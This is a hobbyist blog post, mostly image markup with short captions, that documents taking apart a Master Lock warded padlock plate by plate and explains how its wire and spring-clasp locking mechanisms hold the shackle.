<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib7F99V-PtkeGVtAaxL55tjzi5g8IxuxQvpWOaJBhK4XM0KZr4bAPn673oO-uB39pTOdrCjWAU-OOWZF9m04F5JnIkQch2rL9JMPa57miftk0ytgAlT41yBvxWRSkpwD1VdzsGaUjTrhU/s1600/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj87BpR5XKtivuhOBXF7P9NvRRgTOWC3UdAmH8N5FPRbzZCf6ZxWACY35XuaVWTEBNeVRMNYAjKS5OfPdsp_SU3eU3qwfCztgFGiWdIHApvp2FWgmcSovKFyFmiRzGNjFQO6_DX4A7yxDM/s1600/2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj87BpR5XKtivuhOBXF7P9NvRRgTOWC3UdAmH8N5FPRbzZCf6ZxWACY35XuaVWTEBNeVRMNYAjKS5OfPdsp_SU3eU3qwfCztgFGiWdIHApvp2FWgmcSovKFyFmiRzGNjFQO6_DX4A7yxDM/s200/2.jpg" width="120" /></a><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib7F99V-PtkeGVtAaxL55tjzi5g8IxuxQvpWOaJBhK4XM0KZr4bAPn673oO-uB39pTOdrCjWAU-OOWZF9m04F5JnIkQch2rL9JMPa57miftk0ytgAlT41yBvxWRSkpwD1VdzsGaUjTrhU/s200/1.jpg" width="186" /></div>
This is the Master Lock Warded padlock. Not a particularly impressive lock, but I've never taken one apart before. So I took one apart.<br />
I removed the heads off the bottom posts that hold all the metal plates together.<br />
All I had was a hand file. It took a while, but I finally got the bottom plate off.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGCPWvizeLN31fwzoaCLE4l0pm1nB3fiPt4GhCOVX9QXrsXvL-m9n8TuNourbxAJWxa3mkCTArL70VjyzbURX89eMl3HLssREbptniie47zmRZxE3m3sE6i_iHNGcfd97eGU14TMa71NQ/s1600/3-2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGCPWvizeLN31fwzoaCLE4l0pm1nB3fiPt4GhCOVX9QXrsXvL-m9n8TuNourbxAJWxa3mkCTArL70VjyzbURX89eMl3HLssREbptniie47zmRZxE3m3sE6i_iHNGcfd97eGU14TMa71NQ/s320/3-2.jpg" width="131" /></a><br />
<br />
<br />
<br />
Here we have the bottom plate (what's left of it) the key way circle and the shackle spring. The key way circle sits loose trapped between the bottom and second plates of the lock.<br />
<br />
<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYFoYfUC2EcJBeVx_krPyPiMJnY32EMaT20Z3SjbaSOCdcedEyxLZvGfiJZM4GnowPm-Yu53tp5eeZodM9PT_JfIob56fmFa3zAqtNlXZskJVR3re2xU3lj7AgOD9U25wPGVS9yo-TuOY/s1600/3.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYFoYfUC2EcJBeVx_krPyPiMJnY32EMaT20Z3SjbaSOCdcedEyxLZvGfiJZM4GnowPm-Yu53tp5eeZodM9PT_JfIob56fmFa3zAqtNlXZskJVR3re2xU3lj7AgOD9U25wPGVS9yo-TuOY/s200/3.jpg" width="200" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Here we have the lock, from the bottom, with the bottom plate off. The spring goes into a hollowed out portion on the shackle and is what makes it pop up when the locking mechanisms are released by the key.<br />
<br />
<br />
<br />
After getting the bottom plate off, the rest came off relatively easily. They didn't exactly just all fall off like I had hoped, but I managed to get them off with just a small chisel to separate the plate then a flat head screw driver to move them up and off the posts.<br />
Here's a picture of the lock half disassembled.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg19cFvitJ1QCVUVHBrzm_a6PEEtXQot9nxehmXv2eLtINLpmTAX0AU-y_WFnIbv1gNgd5F9V1JkvV9XzpCbJq8qZBSqUpQl2WA70K93k4GLTh9TwVYWl9UkY8hk6UUkCcITYse36IS1YE/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg19cFvitJ1QCVUVHBrzm_a6PEEtXQot9nxehmXv2eLtINLpmTAX0AU-y_WFnIbv1gNgd5F9V1JkvV9XzpCbJq8qZBSqUpQl2WA70K93k4GLTh9TwVYWl9UkY8hk6UUkCcITYse36IS1YE/s320/4.jpg" width="320" /></a></div>
<br />
Here's the plates that have been removed bottom on the left moving up to the right. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilIOULSQMao-AC00YGZlTYRVenbsiLgRCmq90BbaRhDSTvxhkbl15fVEWAZE7vwGAj2UyClT1CihEhyQQXqkd2abOTpdiPDfSn16gXAGiJ_AvL6c_Hh6-uZl1jOCMQgweDoSld62dtmLU/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilIOULSQMao-AC00YGZlTYRVenbsiLgRCmq90BbaRhDSTvxhkbl15fVEWAZE7vwGAj2UyClT1CihEhyQQXqkd2abOTpdiPDfSn16gXAGiJ_AvL6c_Hh6-uZl1jOCMQgweDoSld62dtmLU/s640/5.jpg" width="640" /></a></div>
<br />
The second to last plate latches into a groove on the bottom of the shackle and prevents it from falling out when opened. Notice the groove on the shackle below. This is also the longer side of the shackle that is drilled out to accept the spring.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOQ7gYAlJ64q1cGZrFttEODrahbF58oiNKosR3_1DGImdakAdEDy08U-B3e53bSONLhT4Au-U4KaMM332DkKIwsb2ckQJi7vLTxQzxvidc3jh2BPcId9s02WnmsWOGlER_9HM76BACuew/s1600/shackle.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOQ7gYAlJ64q1cGZrFttEODrahbF58oiNKosR3_1DGImdakAdEDy08U-B3e53bSONLhT4Au-U4KaMM332DkKIwsb2ckQJi7vLTxQzxvidc3jh2BPcId9s02WnmsWOGlER_9HM76BACuew/s400/shackle.jpg" width="211" /></a></div>
<br />
Next we come to the lower release for the shackle. This is part of two individual locking mechanisms.<br />
The wire sits in a groove on the shackle. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicpfSTLiRYDZ0kSVL5_cyFa-gaRp2m7aSd7Ul4QjLJOHBJ4PIpZCbjEhS86EjdK5CwNzu6v7R9jxx17sxRCRxnr7ui6N7kFT8ZcqN4xUPYPGdAax-f4l3Mdf5HUyWrXXsGhoxjmX7oFyY/s1600/Locking+Spring+-+1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEicpfSTLiRYDZ0kSVL5_cyFa-gaRp2m7aSd7Ul4QjLJOHBJ4PIpZCbjEhS86EjdK5CwNzu6v7R9jxx17sxRCRxnr7ui6N7kFT8ZcqN4xUPYPGdAax-f4l3Mdf5HUyWrXXsGhoxjmX7oFyY/s320/Locking+Spring+-+1.jpg" width="320" /></a></div>
When the key is inserted and turned it moves the wire out of the way. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif73vhzdlrNFDfHWi0LrYZj7jK-347YbVjRYImgm_PB9-3o8qvqpxabgaKYv9IeC5xDYdZz-ojY2vBZgcFt3-mRLIUBpgHrC0gYSdiP7NiVTjX8WbmuaUFBRxSAzH0BIRjXYfTfwJZooY/s1600/Locking+Spring+-+3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEif73vhzdlrNFDfHWi0LrYZj7jK-347YbVjRYImgm_PB9-3o8qvqpxabgaKYv9IeC5xDYdZz-ojY2vBZgcFt3-mRLIUBpgHrC0gYSdiP7NiVTjX8WbmuaUFBRxSAzH0BIRjXYfTfwJZooY/s320/Locking+Spring+-+3.jpg" width="320" /></a></div>
<br />
The middle groove on the shackle is where the locking wire sits. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn2ahiIXuuksjRjLCcIf8ofm90QJViUSDEq6iHscJ-p36pbBDF4AIQlmKIoCA-93jMVfhTeOgWO-iOmTancHRgTBgqwiCNZBY4qgsSmA0VsF-RDC421rJHmmMpHhEU-FeJPjzR4Nl_azE/s1600/Shackle3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn2ahiIXuuksjRjLCcIf8ofm90QJViUSDEq6iHscJ-p36pbBDF4AIQlmKIoCA-93jMVfhTeOgWO-iOmTancHRgTBgqwiCNZBY4qgsSmA0VsF-RDC421rJHmmMpHhEU-FeJPjzR4Nl_azE/s320/Shackle3.jpg" width="224" /></a></div>
<br />
Here is just the plate with the wire. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihUxKMlmYcLF2svedw7TZdiFv9n5lt5aop7Snw_dXFPCw0AQKITnfT1mEc-VJRdnQaSMiPhZmR0Qc7rORYwzank41-qWjY6_bUw-VP-5IAa0oHcbVQYjPW4J6vcDbyck3alkfnUtGEqxU/s1600/Locking+Spring+-+Plate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihUxKMlmYcLF2svedw7TZdiFv9n5lt5aop7Snw_dXFPCw0AQKITnfT1mEc-VJRdnQaSMiPhZmR0Qc7rORYwzank41-qWjY6_bUw-VP-5IAa0oHcbVQYjPW4J6vcDbyck3alkfnUtGEqxU/s320/Locking+Spring+-+Plate.jpg" width="320" /></a></div>
<br />
Next is the upper locking mechanism. It also is a spring like release. When the key is inserted and turned it pushes the two sides apart removing it from the upper grooves on the shackle. (see previous shackle picture, the top groove is where this sits. It is a double sided groove.)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj62OC9XP2qb3MR1VYJZ3k9Ge90nfai6RQSLIMbY-Vbpke9jaEjDWvQdsDHxrny-jK9IcCu2sF1Vn_lppdkG3SHx6ZbFnLyaqfL2L4EGhMeNYweaRahdQ00YOMS_v5QPoYyLMA-pqU50fs/s1600/Locking+Clasp+-+2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj62OC9XP2qb3MR1VYJZ3k9Ge90nfai6RQSLIMbY-Vbpke9jaEjDWvQdsDHxrny-jK9IcCu2sF1Vn_lppdkG3SHx6ZbFnLyaqfL2L4EGhMeNYweaRahdQ00YOMS_v5QPoYyLMA-pqU50fs/s320/Locking+Clasp+-+2.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh70NRZLuyvIcTM8jvS0oEXj5-jVJ_Yk312ixuC6HVPtNZs5WjJHQt9mpBX84zoSIxEOQssi32cNUxV39U9lL04i_p7uHShfHkaOZ2Bhz5bSMkvAffjw2K4gFsdI7eU6XntqGYG0AdG05Y/s1600/Locking+Clasp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh70NRZLuyvIcTM8jvS0oEXj5-jVJ_Yk312ixuC6HVPtNZs5WjJHQt9mpBX84zoSIxEOQssi32cNUxV39U9lL04i_p7uHShfHkaOZ2Bhz5bSMkvAffjw2K4gFsdI7eU6XntqGYG0AdG05Y/s320/Locking+Clasp.jpg" width="320" /></a></div>
<br />
This is a series of pictures of the plates from top to bottom as you take the lock apart, some identical plates in series were not photographed as they added no value to the content.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtJqg0Oh6RqD_GxAzksgoj6yu2j7p-Nv3gdd8058YI2o2op7IqPt9GOkcoXfI1lGbgsAWSJY4cRNOg374Y1XnTzn5gKMCuRQXIdIKcpRrnMNjuhUe0uQBCIqLgOod-APJcYflhz9KDqY/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBtJqg0Oh6RqD_GxAzksgoj6yu2j7p-Nv3gdd8058YI2o2op7IqPt9GOkcoXfI1lGbgsAWSJY4cRNOg374Y1XnTzn5gKMCuRQXIdIKcpRrnMNjuhUe0uQBCIqLgOod-APJcYflhz9KDqY/s320/1.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9VeNmdPxaO2lwlr7OichiUY35SsI9bYLoggJPFXZfIbxOEIIxApfdrxsCuwyfP37AfEtBY0v3n1xQ0T6oEHDsxnv-vbvS0D8X0ViYyWDegn_OU4y4RXvvxjkOxfe_wCZftJt7GD55U4/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo9VeNmdPxaO2lwlr7OichiUY35SsI9bYLoggJPFXZfIbxOEIIxApfdrxsCuwyfP37AfEtBY0v3n1xQ0T6oEHDsxnv-vbvS0D8X0ViYyWDegn_OU4y4RXvvxjkOxfe_wCZftJt7GD55U4/s320/2.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82KaGXTwr1WdttfpmrIjFKls97rouMhLHYxmcEpaEJbGqN3RNussaHduCAKGilxbQBL7kTqM7DP4vCfiUHl0H50HJg6OULHC4npfQ1nqjVBaw5ct3dyMng_kg45eEXEtUKeuQfrCDEDg/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82KaGXTwr1WdttfpmrIjFKls97rouMhLHYxmcEpaEJbGqN3RNussaHduCAKGilxbQBL7kTqM7DP4vCfiUHl0H50HJg6OULHC4npfQ1nqjVBaw5ct3dyMng_kg45eEXEtUKeuQfrCDEDg/s320/3.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsHLh3qbf0ZVD-OsnUjmDolPwU7UKgkDxPja5CeUUN0S5lzF2bDXx56QXnNduCnVHQx6un6EFsEJ4yZ_rTYBbN_YlwsKJ1uwUcUoHw9VQaTYwJLwPoXQB9zTBEzy_R_vrPBSSy9mDPlY/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsHLh3qbf0ZVD-OsnUjmDolPwU7UKgkDxPja5CeUUN0S5lzF2bDXx56QXnNduCnVHQx6un6EFsEJ4yZ_rTYBbN_YlwsKJ1uwUcUoHw9VQaTYwJLwPoXQB9zTBEzy_R_vrPBSSy9mDPlY/s320/4.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnDF7BNKGqTOBCXEAzM7YIjX71zzL_q9om2q7Cx3jcTtHRW49zRbpW5Huz2l2D3POrXVKvxPiDc3SGx6WYgPNc3rc1hAiXbDDaVLeALDbhzfwj8drm34WUUvqjvqq1jYuvfGsLFKSnpts/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnDF7BNKGqTOBCXEAzM7YIjX71zzL_q9om2q7Cx3jcTtHRW49zRbpW5Huz2l2D3POrXVKvxPiDc3SGx6WYgPNc3rc1hAiXbDDaVLeALDbhzfwj8drm34WUUvqjvqq1jYuvfGsLFKSnpts/s320/5.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoEJ_wMrwTYs0QKFo3r8pcpO9orFLEgU-gppXlXg0mUAEDBq76JOnp_mlZtASF54E6w71gJCI1hrL79SHLZZuMoiBZ7GuS78VuMFyn1E5DyrvxTnWI0WE3Czip85cCURq5ylqHBK9Az4Q/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoEJ_wMrwTYs0QKFo3r8pcpO9orFLEgU-gppXlXg0mUAEDBq76JOnp_mlZtASF54E6w71gJCI1hrL79SHLZZuMoiBZ7GuS78VuMFyn1E5DyrvxTnWI0WE3Czip85cCURq5ylqHBK9Az4Q/s320/6.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1DaTkDJOZLfYCcTdZ5ArGpWHWe6WAj-VII0nXynTftJewzN9Hjd6IBiIm-y8mlcVfGaPBG3zwA7_Hc92pSaGzBBG0OdWPZCQGNKhHByUIOAVefK6KzWB3QWav1vy6JwR8NAsmoRogKy4/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1DaTkDJOZLfYCcTdZ5ArGpWHWe6WAj-VII0nXynTftJewzN9Hjd6IBiIm-y8mlcVfGaPBG3zwA7_Hc92pSaGzBBG0OdWPZCQGNKhHByUIOAVefK6KzWB3QWav1vy6JwR8NAsmoRogKy4/s320/7.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA_G4YgSsZwPyOEdqj0epAnDYn_5opitW5MyEBOM6Ub-HwSmONK2BEHgg5OHJe_NygJB1w5eclsYsfPV4GgfDhQHSYBou-ua2bfMK05nczae1IZQSXWQU3AsYE9Ha_jf_oIwd2YWgnmko/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA_G4YgSsZwPyOEdqj0epAnDYn_5opitW5MyEBOM6Ub-HwSmONK2BEHgg5OHJe_NygJB1w5eclsYsfPV4GgfDhQHSYBou-ua2bfMK05nczae1IZQSXWQU3AsYE9Ha_jf_oIwd2YWgnmko/s320/8.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjze-q_DoL9pwRWjiWRAcPIC6oStAVRQ5yGf_aCFPT4wiSeuaJ8Lot6OxvNF7JJj7NcHz836T_Y-cgnpP0mObAA3okzZ6e2ZwChsdWe7OyiuV1GP3GC0UVzWRA3A2LGNYdSyFvdQo-wLtc/s1600/9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjze-q_DoL9pwRWjiWRAcPIC6oStAVRQ5yGf_aCFPT4wiSeuaJ8Lot6OxvNF7JJj7NcHz836T_Y-cgnpP0mObAA3okzZ6e2ZwChsdWe7OyiuV1GP3GC0UVzWRA3A2LGNYdSyFvdQo-wLtc/s320/9.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdcIOG_xodHuduTIvD6f3VihnfhH-Iy5_UCDsQsqDAnn_ahKi8TGRDNTB3uugG-kKOPwCS_O8hLO4vf1wFzkd5Wq_NR-2Wop3C5aMgXa8caM6p0yWz45Gtybuisxmz0R7r8jJlyOdMCiw/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdcIOG_xodHuduTIvD6f3VihnfhH-Iy5_UCDsQsqDAnn_ahKi8TGRDNTB3uugG-kKOPwCS_O8hLO4vf1wFzkd5Wq_NR-2Wop3C5aMgXa8caM6p0yWz45Gtybuisxmz0R7r8jJlyOdMCiw/s320/10.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8BGNwqdrBFxqUWN1VUifyDiuDSJp3YMU-ANQrvIkHFkZ-77AeFh4ll3PUiQ35D1BRfJxb5fBWrGdEhRaWgHkTW51fadt9Na-j2ADbNAPRT3j7fPjVNdlfMsEfL7bicpbPyx0Vtk5Mu6Q/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8BGNwqdrBFxqUWN1VUifyDiuDSJp3YMU-ANQrvIkHFkZ-77AeFh4ll3PUiQ35D1BRfJxb5fBWrGdEhRaWgHkTW51fadt9Na-j2ADbNAPRT3j7fPjVNdlfMsEfL7bicpbPyx0Vtk5Mu6Q/s320/11.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLSweBafIYN5F1TW3XSB4DvXxDebxoIMq76J7-lYV7eRnmhWPXUfmkzRGvvGIM5v5I8HmNwfdW_oNwApte1B4ZKoouWTBsADc8NwLa0Nbf04qRRgw95xl7jfx5paGpYIlmBO0Kr_HO5o/s1600/12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLSweBafIYN5F1TW3XSB4DvXxDebxoIMq76J7-lYV7eRnmhWPXUfmkzRGvvGIM5v5I8HmNwfdW_oNwApte1B4ZKoouWTBsADc8NwLa0Nbf04qRRgw95xl7jfx5paGpYIlmBO0Kr_HO5o/s320/12.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgff-fvo42ngAVp5SGYgnnURLMJENArnQYyzlLcXCBUGi6k93PfixsXH8pjrrGQIkMrhl4wxNeRRsoYs0Ks4aHx5kmo5xidTN33sfQ3uI4xijlSb7-Ky571tkQAfygFzMqgvFkKy4i1HfQ/s1600/13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgff-fvo42ngAVp5SGYgnnURLMJENArnQYyzlLcXCBUGi6k93PfixsXH8pjrrGQIkMrhl4wxNeRRsoYs0Ks4aHx5kmo5xidTN33sfQ3uI4xijlSb7-Ky571tkQAfygFzMqgvFkKy4i1HfQ/s320/13.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVwhX0WWkP5glmlkV_zsjn1dXJ39z4tBDkGcgFVfCrbItGZhWCWUBIRQNwcXuTB-ledoPqq1uP5E70MXU6TU1b14IpjGaycRNpy2FLkl63JHO9NP_qKkhsNdiX8jbTmrkkaKmVY1oolxg/s1600/14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVwhX0WWkP5glmlkV_zsjn1dXJ39z4tBDkGcgFVfCrbItGZhWCWUBIRQNwcXuTB-ledoPqq1uP5E70MXU6TU1b14IpjGaycRNpy2FLkl63JHO9NP_qKkhsNdiX8jbTmrkkaKmVY1oolxg/s320/14.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB6g3A2rZ4jZkjnsF9Mrz4n1wMoKZRDeTUuHqjRczk_0xWj2sfYs2Z3Z7_L1VmMcKMnrGC6ZivnXZ-9OEwb1jEs7gG-ToTLEv_ZAm2sqXqR5BYGZjJwTuYpX4FzUu54VBAb7wi9DsH-2c/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB6g3A2rZ4jZkjnsF9Mrz4n1wMoKZRDeTUuHqjRczk_0xWj2sfYs2Z3Z7_L1VmMcKMnrGC6ZivnXZ-9OEwb1jEs7gG-ToTLEv_ZAm2sqXqR5BYGZjJwTuYpX4FzUu54VBAb7wi9DsH-2c/s320/15.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7e6-A6B9GMURm31IVOc8UiVVL-6GsA5HuzDJ85OpTcbwz2C-jptinG7j9J-SGNp62eH233uaINbqtaUmUK4kh9YlgidbrxzvUtHzgud4tpkAUkP5al0T-SEkM8uYk3rQtyoCDbtU6NYY/s1600/16.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7e6-A6B9GMURm31IVOc8UiVVL-6GsA5HuzDJ85OpTcbwz2C-jptinG7j9J-SGNp62eH233uaINbqtaUmUK4kh9YlgidbrxzvUtHzgud4tpkAUkP5al0T-SEkM8uYk3rQtyoCDbtU6NYY/s320/16.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkDe1P768mp2Tu0dsf3j2tqow_xy2QE_i60Oyjw01JhCeCJ3D9omONwTEAlM-K8dh-7kv9yWkXHUsoEovv3qzhEQlpZNgu6obb0jb5N__drLA5H4fZEtbgK_486d-n0ofDmUOz2ucqCqo/s1600/17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkDe1P768mp2Tu0dsf3j2tqow_xy2QE_i60Oyjw01JhCeCJ3D9omONwTEAlM-K8dh-7kv9yWkXHUsoEovv3qzhEQlpZNgu6obb0jb5N__drLA5H4fZEtbgK_486d-n0ofDmUOz2ucqCqo/s320/17.jpg" width="320" /></a></div>
<br />
Here is the full lock disassembled bottom at the left top at the right.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6y_PyAyFQ0726YuYuSqc7ZQ4B_NiXjX7bRYv9XXTG5njOWSqMwhPOl1rmdd6WFWEPbToc4en1l-rV7LLdDWau2pI-_SgnRBBUIDsGmVAR9rhd_bNxo7gjCSBq31dVv_MU0s4Y0Lww594/s1600/Total.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6y_PyAyFQ0726YuYuSqc7ZQ4B_NiXjX7bRYv9XXTG5njOWSqMwhPOl1rmdd6WFWEPbToc4en1l-rV7LLdDWau2pI-_SgnRBBUIDsGmVAR9rhd_bNxo7gjCSBq31dVv_MU0s4Y0Lww594/s640/Total.jpg" width="640" /></a></div>
<br />
The bottom half of the lock plates:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8e7dKM-P0RLh6ZADZCFHU2x9Mdhi4u3BCm-bcNW_vsEgWnPH9BoUY3IDduVV4930KXeSFu_ldkpZcfbE_Z2o8dVerVxes3jQoQ_Y4CYOx92n5nholczuoI4-6GhSq7YcMNHhVs4msVyc/s1600/Total+-+left.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8e7dKM-P0RLh6ZADZCFHU2x9Mdhi4u3BCm-bcNW_vsEgWnPH9BoUY3IDduVV4930KXeSFu_ldkpZcfbE_Z2o8dVerVxes3jQoQ_Y4CYOx92n5nholczuoI4-6GhSq7YcMNHhVs4msVyc/s640/Total+-+left.jpg" width="640" /></a></div>
<br />
The top half of the lock plates:<br />
<div class="separator" style="clear: both; text-align: center;">
